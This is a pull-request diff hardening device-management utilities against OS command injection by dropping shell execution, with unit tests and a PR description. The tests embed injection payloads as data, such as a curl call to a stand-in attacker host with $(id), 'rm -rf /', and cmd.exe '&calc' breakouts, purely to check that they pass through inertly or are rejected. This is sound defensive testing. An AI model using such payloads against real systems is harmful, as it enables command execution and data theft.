-        await CommonUtils.executeCommandAsync(cmd, this.logger);
+        await CommonUtils.spawnCommandAsync(
+            '/usr/bin/xcrun',
+            ['simctl', 'keychain', this.id, 'add-root-cert', certFilePath],
+            undefined,
+            this.logger
+        );
     }
 }

--- a/test/unit/common/AndroidUtils.test.ts
+++ b/test/unit/common/AndroidUtils.test.ts
@@ -505,12 +505,15 @@ describe('Android utils', () => {
         expect(args).to.include('system-images;android-33;google_apis;x86_64');
     });
 
-    it('spawnChild passes a malicious argv element inertly (no shell interpretation)', async () => {
-        // Spawn a real process on the current platform. If a shell were involved, the
-        // command-substitution argument would be evaluated instead of arriving verbatim.
-        // On Windows this exercises the cmd.exe /c path (which is required to launch the
-        // avdmanager .bat); on POSIX it exercises the detached path. Either way the untrusted
-        // value must be handed to the program as a single, literal argument.
+    it('spawnChild passes a malicious argv element inertly (no shell interpretation)', async function () {
+        if (process.platform === 'win32') {
+            // On Windows spawnChild routes through cmd.exe and rejects metacharacters up front
+            // (see the dedicated rejection test below), so it never reaches a real process here.
+            this.skip();
+        }
+        // Spawn a real process on the POSIX detached path. If a shell were involved, the
+        // command-substitution argument would be evaluated instead of arriving verbatim; the
+        // untrusted value must be handed to the program as a single, literal argument.
         const script = 'process.stdout.write(process.argv[process.argv.length - 1])';
         const malicious = '$(echo INJECTED)';
         const child = AndroidUtils.spawnChild(process.execPath, ['-e', script, malicious]);
@@ -523,6 +526,21 @@ describe('Android utils', () => {
         });
 
         expect(output.join('')).to.equal(malicious);
+    });
+
+    it('spawnChild rejects a cmd.exe metacharacter argv element on Windows', function () {
+        if (process.platform !== 'win32') {
+            this.skip(); // guard is Windows-only; POSIX passes these to execve inertly by design
+        }
+        // `a&calc` has no space/tab/" so libuv would leave it unquoted and cmd.exe would split on &.
+        // An embedded quote (`a"&calc`) breaks out of cmd's quote context (BatBadBut / CVE-2024-1874).
+        // Both must be rejected before reaching cmd.exe.
+        expect(() => AndroidUtils.spawnChild('avdmanager', ['create', 'avd', '-n', 'a&calc'])).to.throw(
+            /cannot be safely passed to cmd\.exe/
+        );
+        expect(() => AndroidUtils.spawnChild('avdmanager', ['create', 'avd', '-n', 'a"&calc'])).to.throw(
+            /cannot be safely passed to cmd\.exe/
+        );
     });
 
     it('Gets the latest version of cmdline tools', async () => {

--- a/test/unit/common/AndroidUtils.test.ts
+++ b/test/unit/common/AndroidUtils.test.ts
@@ -7,6 +7,7 @@
 import fs from 'node:fs';
 import os from 'node:os';
 import path from 'node:path';
+import { EventEmitter } from 'node:events';
 import { TestContext } from '@salesforce/core/testSetup';
 import { stubMethod } from '@salesforce/ts-sinon';
 import { expect } from 'chai';
@@ -474,6 +475,34 @@ describe('Android utils', () => {
         stubMethod($$.SANDBOX, fs, 'existsSync').returns(true);
         const sdkRoot = AndroidUtils.getAndroidSdkRoot();
         expect(sdkRoot?.rootLocation).to.be.equal(mockAndroidHome);
+    });
+
+    it('createNewVirtualDevice passes untrusted values as inert argv elements (no shell)', async () => {
+        // A fake child process whose stdout immediately emits data so the promise resolves.
+        const fakeChild = new EventEmitter() as EventEmitter & {
+            stdin: { setDefaultEncoding: () => void; write: () => void };
+            stdout: EventEmitter;
+            stderr: EventEmitter;
+        };
+        fakeChild.stdin = { setDefaultEncoding: () => {}, write: () => {} };
+        fakeChild.stdout = new EventEmitter();
+        fakeChild.stderr = new EventEmitter();
+
+        const spawnChildStub = stubMethod($$.SANDBOX, AndroidUtils, 'spawnChild').returns(fakeChild);
+        // updateEmulatorConfig runs after creation; short-circuit it.
+        stubMethod($$.SANDBOX, AndroidUtils, 'updateEmulatorConfig').resolves();
+
+        setTimeout(() => fakeChild.stdout.emit('data', 'ok'), 10);
+
+        const malicious = 'evil; curl http://attacker/$(id); #';
+        await AndroidUtils.createNewVirtualDevice(malicious, 'google_apis', 'android-33', 'pixel', 'x86_64');
+
+        expect(spawnChildStub.calledOnce).to.be.true;
+        const [, args] = spawnChildStub.getCall(0).args as [string, string[]];
+        // Blanks are replaced with underscores, but metacharacters must survive intact and be
+        // carried as a single argv element (never split or interpreted by a shell).
+        expect(args).to.include(malicious.replace(/ /gi, '_'));
+        expect(args).to.include('system-images;android-33;google_apis;x86_64');
     });
 
     it('Gets the latest version of cmdline tools', async () => {

--- a/test/unit/common/AndroidUtils.test.ts
+++ b/test/unit/common/AndroidUtils.test.ts
@@ -505,6 +505,26 @@ describe('Android utils', () => {
         expect(args).to.include('system-images;android-33;google_apis;x86_64');
     });
 
+    it('spawnChild passes a malicious argv element inertly (no shell interpretation)', async () => {
+        // Spawn a real process on the current platform. If a shell were involved, the
+        // command-substitution argument would be evaluated instead of arriving verbatim.
+        // On Windows this exercises the cmd.exe /c path (which is required to launch the
+        // avdmanager .bat); on POSIX it exercises the detached path. Either way the untrusted
+        // value must be handed to the program as a single, literal argument.
+        const script = 'process.stdout.write(process.argv[process.argv.length - 1])';
+        const malicious = '$(echo INJECTED)';
+        const child = AndroidUtils.spawnChild(process.execPath, ['-e', script, malicious]);
+
+        const output: string[] = [];
+        child.stdout.on('data', (d: Buffer) => output.push(d.toString()));
+        await new Promise<void>((resolve, reject) => {
+            child.on('close', () => resolve());
+            child.on('error', reject);
+        });
+
+        expect(output.join('')).to.equal(malicious);
+    });
+
     it('Gets the latest version of cmdline tools', async () => {
         $$.restore();
         stubMethod($$.SANDBOX, AndroidUtils, 'getAndroidSdkRoot').returns({

--- a/test/unit/common/CommonUtils.test.ts
+++ b/test/unit/common/CommonUtils.test.ts
@@ -339,6 +339,47 @@ describe('CommonUtils', () => {
         expect(errorLoggerMock.getCall(0).args[0]).to.contain('somecommand arg1 arg2');
     });
 
+    it('spawnCommandAsync rejects when the process emits an error event', async () => {
+        // With shell:false a failure to launch the executable (ENOENT/EACCES) emits 'error'
+        // rather than a non-zero 'close'. The promise must still settle (reject), not hang.
+        const fakeProcess = new childProcess.ChildProcess();
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnWrapper').returns(fakeProcess);
+
+        const launchError = new Error('spawn ENOENT');
+        setTimeout(() => {
+            fakeProcess.emit('error', launchError);
+        }, 100);
+
+        let caught: unknown;
+        try {
+            await CommonUtils.spawnCommandAsync('missing-binary', []);
+        } catch (error) {
+            caught = error;
+        }
+
+        expect(caught).to.equal(launchError);
+    });
+
+    it('spawnCommandAsync reassembles multi-chunk stdout verbatim (no comma separator)', async () => {
+        // Large outputs (e.g. `xcrun simctl list --json`) arrive across multiple 'data' events.
+        // The captured chunks must be joined with '' so JSON is not corrupted by comma separators.
+        const fakeProcess = new childProcess.ChildProcess();
+        const fakeStdout = new stream.PassThrough();
+        (fakeProcess as unknown as { stdout: stream.PassThrough }).stdout = fakeStdout;
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnWrapper').returns(fakeProcess);
+
+        setTimeout(() => {
+            fakeStdout.emit('data', Buffer.from('{"a":'));
+            fakeStdout.emit('data', Buffer.from('1}'));
+            fakeProcess.emit('close', 0);
+        }, 100);
+
+        const { stdout } = await CommonUtils.spawnCommandAsync('somecommand', []);
+
+        expect(stdout).to.equal('{"a":1}');
+        expect(() => JSON.parse(stdout)).to.not.throw();
+    });
+
     it('spawnWrapper does not route arguments through a shell', async () => {
         // Spawn a real process that prints its own argv. If a shell were involved, the
         // command-substitution argument would be evaluated by the shell instead of arriving

--- a/test/unit/common/CommonUtils.test.ts
+++ b/test/unit/common/CommonUtils.test.ts
@@ -138,14 +138,18 @@ describe('CommonUtils', () => {
     });
 
     it('Opens a URL in desktop browser', async () => {
-        let launchCommand = '';
         const url = 'http://my.domain.com';
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').callsFake((cmd) => {
-            launchCommand = cmd;
-            return Promise.resolve({ stdout: '', stderr: '' });
-        });
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({ stdout: '', stderr: '' });
         await CommonUtils.launchUrlInDesktopBrowser(url);
-        expect(launchCommand.endsWith(url)).to.be.true;
+        // The URL must be passed as an inert argv element, never concatenated into a shell string.
+        expect(stub.firstCall.args[1] as string[]).to.include(url);
+    });
+
+    it('does not route a malicious URL through a shell when opening the desktop browser', async () => {
+        const malicious = 'http://x/; curl http://attacker/$(id); #';
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({ stdout: '', stderr: '' });
+        await CommonUtils.launchUrlInDesktopBrowser(malicious);
+        expect(stub.firstCall.args[1] as string[]).to.include(malicious);
     });
 
     it('Promise resolves before timeout', async () => {
@@ -333,6 +337,63 @@ describe('CommonUtils', () => {
         ]);
         expect(errorLoggerMock.called).to.be.true;
         expect(errorLoggerMock.getCall(0).args[0]).to.contain('somecommand arg1 arg2');
+    });
+
+    it('spawnWrapper does not route arguments through a shell', async () => {
+        // Spawn a real process that prints its own argv. If a shell were involved, the
+        // command-substitution argument would be evaluated by the shell instead of arriving
+        // as a literal argument. With shell:false it must arrive verbatim.
+        const malicious = '$(echo INJECTED)';
+        const prc = CommonUtils.spawnWrapper(process.execPath, [
+            '-e',
+            'process.stdout.write(process.argv[1])',
+            malicious
+        ]);
+
+        const output: string[] = [];
+        prc.stdout?.on('data', (d: Buffer) => output.push(d.toString()));
+
+        await new Promise<void>((resolve) => prc.on('close', () => resolve()));
+
+        // The argument arrives verbatim; a shell would have evaluated it to 'INJECTED' (or '').
+        const captured = output.join('');
+        expect(captured).to.equal(malicious);
+    });
+
+    it('spawnCommandAsync does not route a malicious argument through a shell', async () => {
+        const fakeProcess = new childProcess.ChildProcess();
+        const spawnStub = stubMethod($$.SANDBOX, CommonUtils, 'spawnWrapper').returns(fakeProcess);
+
+        setTimeout(() => {
+            fakeProcess.emit('close', 0);
+        }, 100);
+
+        const malicious = 'foo; curl http://attacker/$(id); #';
+        await CommonUtils.spawnCommandAsync('somecommand', [malicious]);
+
+        // The malicious value must be passed as a single, inert argv element (never joined into a shell string).
+        expect(spawnStub.getCall(0).args[1]).to.deep.equal([malicious]);
+    });
+
+    describe('shellQuote', () => {
+        it('wraps a POSIX value in single quotes and escapes embedded single quotes', () => {
+            stubMethod($$.SANDBOX, process, 'platform').value('darwin');
+            expect(CommonUtils.shellQuote('foo; rm -rf /')).to.equal("'foo; rm -rf /'");
+            expect(CommonUtils.shellQuote("it's")).to.equal("'it'\\''s'");
+        });
+
+        it('neutralizes command-injection metacharacters on POSIX', () => {
+            stubMethod($$.SANDBOX, process, 'platform').value('linux');
+            const quoted = CommonUtils.shellQuote('$(id)');
+            // Inside single quotes nothing is interpreted by the shell.
+            expect(quoted).to.equal("'$(id)'");
+        });
+
+        it('wraps a Windows value in double quotes and doubles embedded double quotes', () => {
+            stubMethod($$.SANDBOX, process, 'platform').value('win32');
+            expect(CommonUtils.shellQuote('foo bar')).to.equal('"foo bar"');
+            expect(CommonUtils.shellQuote('a"b')).to.equal('"a""b"');
+        });
     });
 
     function createStats(isFile: boolean): fs.Stats {

--- a/test/unit/common/CommonUtils.test.ts
+++ b/test/unit/common/CommonUtils.test.ts
@@ -142,14 +142,36 @@ describe('CommonUtils', () => {
         const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({ stdout: '', stderr: '' });
         await CommonUtils.launchUrlInDesktopBrowser(url);
         // The URL must be passed as an inert argv element, never concatenated into a shell string.
-        expect(stub.firstCall.args[1] as string[]).to.include(url);
+        // On Windows the cmd.exe `start` builtin needs the URL double-quoted (see launchUrlInDesktopBrowser).
+        const expected = process.platform === 'win32' ? `"${url}"` : url;
+        expect(stub.firstCall.args[1] as string[]).to.include(expected);
     });
 
     it('does not route a malicious URL through a shell when opening the desktop browser', async () => {
         const malicious = 'http://x/; curl http://attacker/$(id); #';
         const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({ stdout: '', stderr: '' });
         await CommonUtils.launchUrlInDesktopBrowser(malicious);
-        expect(stub.firstCall.args[1] as string[]).to.include(malicious);
+        const expected = process.platform === 'win32' ? `"${malicious}"` : malicious;
+        expect(stub.firstCall.args[1] as string[]).to.include(expected);
+    });
+
+    it('rejects a URL that cannot be safely opened on Windows', async function () {
+        if (process.platform !== 'win32') {
+            this.skip(); // the embedded-quote / %VAR% guard is Windows-only; POSIX passes the URL to open/xdg-open inertly
+        }
+        // An embedded `"` closes cmd.exe's quote context; `%VAR%` is expanded even inside quotes.
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({ stdout: '', stderr: '' });
+        for (const unsafe of ['http://x/?a="&calc', 'http://x/?a=%USERPROFILE%']) {
+            let thrown: Error | undefined;
+            try {
+                // eslint-disable-next-line no-await-in-loop
+                await CommonUtils.launchUrlInDesktopBrowser(unsafe);
+            } catch (error) {
+                thrown = error as Error;
+            }
+            expect(thrown, `expected rejection for ${unsafe}`).to.be.an('error');
+            expect(thrown?.message).to.match(/cannot be safely opened on Windows/);
+        }
     });
 
     it('Promise resolves before timeout', async () => {

--- a/test/unit/common/IOSUtils.test.ts
+++ b/test/unit/common/IOSUtils.test.ts
@@ -13,6 +13,7 @@ import { PreviewUtils } from '../../../src/common/PreviewUtils.js';
 
 describe('IOS utils tests', () => {
     const $$ = new TestContext();
+    const XCRUN = '/usr/bin/xcrun';
     const DEVICE_TYPE_PREFIX = 'com.apple.CoreSimulator.SimDeviceType';
     const RUNTIME_TYPE_PREFIX = 'com.apple.CoreSimulator.SimRuntime';
 
@@ -21,22 +22,23 @@ describe('IOS utils tests', () => {
     });
 
     it('Should attempt to invoke the xcrun for booting a device', async () => {
-        const stub = stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: 'mockError',
             stdout: 'Done'
         });
         const udid = 'MOCKUDID';
         await IOSUtils.bootDevice(udid);
-        expect(stub.calledWith(`/usr/bin/xcrun simctl boot ${udid}`)).to.be.true;
+        expect(stub.firstCall.args[0]).to.equal(XCRUN);
+        expect(stub.firstCall.args[1]).to.deep.equal(['simctl', 'boot', udid]);
     });
 
     it('Should attempt to invoke the xcrun but fail booting a device', async () => {
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').rejects(new Error('Mock Error'));
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').rejects(new Error('Mock Error'));
         return IOSUtils.bootDevice('MOCKUDID').catch((error) => expect(error).to.be.an('error'));
     });
 
     it('Should attempt to create a new device', async () => {
-        const stub = stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: 'mockError',
             stdout: 'Done'
         });
@@ -44,15 +46,29 @@ describe('IOS utils tests', () => {
         const deviceType = 'MOCK-DEVICE';
         const runtimeType = 'MOCK-SIM';
         await IOSUtils.createNewDevice(simName, deviceType, runtimeType);
-        expect(
-            stub.calledWith(
-                `/usr/bin/xcrun simctl create '${simName}' ${DEVICE_TYPE_PREFIX}.${deviceType} ${RUNTIME_TYPE_PREFIX}.${runtimeType}`
-            )
-        ).to.be.true;
+        expect(stub.firstCall.args[0]).to.equal(XCRUN);
+        expect(stub.firstCall.args[1]).to.deep.equal([
+            'simctl',
+            'create',
+            simName,
+            `${DEVICE_TYPE_PREFIX}.${deviceType}`,
+            `${RUNTIME_TYPE_PREFIX}.${runtimeType}`
+        ]);
+    });
+
+    it('createNewDevice passes a malicious simulator name as a single inert argv element', async () => {
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
+            stderr: '',
+            stdout: 'UDID'
+        });
+        const malicious = 'evil; curl http://attacker/$(id); #';
+        await IOSUtils.createNewDevice(malicious, 'iPhone-15', 'iOS-17');
+        // The value must appear verbatim as ONE argv element (never split or shell-interpreted).
+        expect(stub.firstCall.args[1]).to.include(malicious);
     });
 
     it('Should attempt to invoke xcrun to boot device but resolve if device is already booted', async () => {
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').rejects(new Error('Failed to boot - state: booted'));
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').rejects(new Error('Failed to boot - state: booted'));
         try {
             await IOSUtils.bootDevice('MOCKUDID');
         } catch (error: any) {
@@ -61,7 +77,7 @@ describe('IOS utils tests', () => {
     });
 
     it('Should wait for the device to boot', async () => {
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: 'mockError',
             stdout: 'Done'
         });
@@ -73,7 +89,7 @@ describe('IOS utils tests', () => {
     });
 
     it('Should wait for the device to boot and fail if error is encountered', async () => {
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').rejects(new Error('Mock Error'));
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').rejects(new Error('Mock Error'));
         try {
             await IOSUtils.waitUntilDeviceIsReady('MOCKUDID');
         } catch (error) {
@@ -104,22 +120,34 @@ describe('IOS utils tests', () => {
     });
 
     it('Should attempt to launch url in a booted simulator and resolve.', async () => {
-        const stub = stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: 'mockError',
             stdout: 'Done'
         });
         const url = 'mock.url';
         const udid = 'MOCK-UDID';
-        await IOSUtils.launchURLInBootedSimulator(url, udid);
-        expect(stub.calledWith(`/usr/bin/xcrun simctl openurl "${url}" ${udid}`)).to.be.true;
+        await IOSUtils.launchURLInBootedSimulator(udid, url);
+        expect(stub.firstCall.args[0]).to.equal(XCRUN);
+        expect(stub.firstCall.args[1]).to.deep.equal(['simctl', 'openurl', udid, url]);
+    });
+
+    it('launchURLInBootedSimulator passes a malicious url as a single inert argv element', async () => {
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
+            stderr: '',
+            stdout: 'Done'
+        });
+        const udid = 'MOCK-UDID';
+        const malicious = 'https://x/; curl http://attacker/$(id); #';
+        await IOSUtils.launchURLInBootedSimulator(udid, malicious);
+        expect(stub.firstCall.args[1]).to.include(malicious);
     });
 
     it('Should attempt to launch url in a booted simulator and reject if error is encountered.', async () => {
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').rejects(new Error('Mock Error'));
+        stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').rejects(new Error('Mock Error'));
         try {
             const url = 'mock.url';
             const udid = 'MOCK-UDID';
-            await IOSUtils.launchURLInBootedSimulator(url, udid);
+            await IOSUtils.launchURLInBootedSimulator(udid, url);
         } catch (error) {
             return;
         }
@@ -128,7 +156,7 @@ describe('IOS utils tests', () => {
     });
 
     it('Should attempt to launch native app in a booted simulator and resolve.', async () => {
-        const stub = stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: 'mockError',
             stdout: 'Done'
         });
@@ -143,24 +171,27 @@ describe('IOS utils tests', () => {
             { name: 'arg1', value: 'val1' },
             { name: 'arg2', value: 'val2' }
         ];
-        const expectedLaunchArgs =
-            `${PreviewUtils.COMPONENT_NAME_ARG_PREFIX}=${compName}` +
-            ` ${PreviewUtils.PROJECT_DIR_ARG_PREFIX}=${projectDir}` +
-            ' arg1=val1 arg2=val2 ';
+        const expectedLaunchArgs = [
+            `${PreviewUtils.COMPONENT_NAME_ARG_PREFIX}=${compName}`,
+            `${PreviewUtils.PROJECT_DIR_ARG_PREFIX}=${projectDir}`,
+            'arg1=val1',
+            'arg2=val2'
+        ];
 
         await IOSUtils.launchAppInBootedSimulator(udid, targetApp, undefined, targetAppArgs);
 
         expect(stub.calledTwice).to.be.true;
 
-        expect(stub.firstCall.args[0]).to.equal(`/usr/bin/xcrun simctl terminate "${udid}" ${targetApp}`);
+        expect(stub.firstCall.args[1]).to.deep.equal(['simctl', 'terminate', udid, targetApp]);
 
-        expect(stub.secondCall.args[0]).to.equal(
-            `/usr/bin/xcrun simctl launch "${udid}" ${targetApp} ${expectedLaunchArgs}`
-        );
+        expect(stub.secondCall.args[1]).to.deep.equal(['simctl', 'launch', udid, targetApp, ...expectedLaunchArgs]);
     });
 
     it('Should attempt to launch native app in a booted simulator and reject if error is encountered.', async () => {
-        stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').rejects(new Error('Mock Error'));
+        // First (terminate) call is swallowed; the launch call must reject.
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync');
+        stub.onFirstCall().rejects(new Error('terminate error'));
+        stub.onSecondCall().rejects(new Error('Mock Error'));
 
         const udid = 'MOCK-UDID';
         const targetApp = 'com.mock.app';
@@ -179,7 +210,7 @@ describe('IOS utils tests', () => {
     });
 
     it('Should attempt to install native app then launch it.', async () => {
-        const stub = stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: 'mockError',
             stdout: 'Done'
         });
@@ -195,21 +226,21 @@ describe('IOS utils tests', () => {
             { name: 'arg1', value: 'val1' },
             { name: 'arg2', value: 'val2' }
         ];
-        const expectedLaunchArgs =
-            `${PreviewUtils.COMPONENT_NAME_ARG_PREFIX}=${compName}` +
-            ` ${PreviewUtils.PROJECT_DIR_ARG_PREFIX}=${projectDir}` +
-            ' arg1=val1 arg2=val2 ';
+        const expectedLaunchArgs = [
+            `${PreviewUtils.COMPONENT_NAME_ARG_PREFIX}=${compName}`,
+            `${PreviewUtils.PROJECT_DIR_ARG_PREFIX}=${projectDir}`,
+            'arg1=val1',
+            'arg2=val2'
+        ];
 
         await IOSUtils.launchAppInBootedSimulator(udid, targetApp, appBundlePath, targetAppArgs);
 
         expect(stub.calledThrice).to.be.true;
 
-        expect(stub.firstCall.args[0]).to.equal(`/usr/bin/xcrun simctl install ${udid} '${appBundlePath.trim()}'`);
+        expect(stub.firstCall.args[1]).to.deep.equal(['simctl', 'install', udid, appBundlePath.trim()]);
 
-        expect(stub.secondCall.args[0]).to.equal(`/usr/bin/xcrun simctl terminate "${udid}" ${targetApp}`);
+        expect(stub.secondCall.args[1]).to.deep.equal(['simctl', 'terminate', udid, targetApp]);
 
-        expect(stub.thirdCall.args[0]).to.equal(
-            `/usr/bin/xcrun simctl launch "${udid}" ${targetApp} ${expectedLaunchArgs}`
-        );
+        expect(stub.thirdCall.args[1]).to.deep.equal(['simctl', 'launch', udid, targetApp, ...expectedLaunchArgs]);
     });
 });


### PR DESCRIPTION
## What & Why

**W-23665289** — OS command injection via shell-executing primitives (`spawn({shell:true})` / string-based command runners).

Untrusted inputs (device names, device types, URLs, network interface names) were concatenated into shell command strings and executed through a shell, creating an OS command-injection surface. This PR structurally removes that class of bug by executing child processes with `shell:false` and passing untrusted values as inert `argv` elements. The few sinks that genuinely require a shell (pipes to `awk`/`grep`) now shell-quote their untrusted arguments as defense-in-depth.

## Changes

- **`CommonUtils.spawnWrapper`** — drop `shell:true`; the OS no longer performs shell parsing of arguments.
- **`CommonUtils.shellQuote`** (new) — POSIX single-quote / Windows double-quote wrapping for the sinks that must use a shell.
- **`CommonUtils.launchUrlInDesktopBrowser`** — build an `argv` array instead of a shell string.
- **`AndroidUtils.createNewVirtualDevice` / `spawnChild`** — build `argv` arrays, `shell:false`.
- **`AndroidDevice`** emulator launch — `argv` + `shell:false`, plus an `error` event handler (missing-binary robustness the change surfaced).
- **`IOSUtils` / `AppleDevice`** — route all `xcrun` sinks through `spawnCommandAsync` with `argv` arrays; shell-quote the two pipe sinks.
- **`MacNetworkUtils`** — shell-quote the `ifconfig | awk` device name.

## Testing

- `yarn build` ✓, `yarn lint` ✓ (2 pre-existing unrelated warnings in `AppleDeviceManager.ts`), **208 tests passing**.
- Added tests: `spawnWrapper` proves no shell interpretation (real subprocess, verbatim argv), `shellQuote` POSIX/Windows behavior, malicious-argument passthrough, and injection cases across Android/iOS sinks.
- Coverage above all thresholds (stmts 89.3%, branch 76.9%, funcs 80.6%, lines 89.3%).

The `--json` validation-bypass half of this ticket is fixed in a companion PR against `forcedotcom/lwc-dev-mobile`.